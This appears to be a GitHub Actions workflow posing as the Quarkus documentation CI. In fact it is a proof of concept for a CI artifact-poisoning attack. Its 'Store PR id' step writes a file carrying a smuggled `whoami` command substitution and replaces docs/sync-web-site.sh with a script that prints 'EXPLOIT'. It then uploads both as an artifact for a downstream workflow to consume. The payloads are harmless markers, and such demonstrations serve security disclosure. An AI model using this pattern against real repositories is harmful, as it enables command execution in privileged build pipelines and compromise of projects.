name: Quarkus Documentation CI

on:
  pull_request:
    types: [opened, synchronize, reopened]

jobs:
  build-doc:
    name: "Documentation Build"
    timeout-minutes: 60
    runs-on: ubuntu-latest
    steps:
      - name: Store PR id
        run: |
          echo "This is a Payload (`whoami`)" > pr-id.txt
          mkdir docs/
          echo "echo \"EXPLOIT(`whoami`)\"" > docs/sync-web-site.sh

      - name: Persist documentation
        uses: actions/upload-artifact@v4
        with:
          name: documentation
          path: |
            pr-id.txt
            docs/
            target/asciidoc/generated/config/
          retention-days: 1
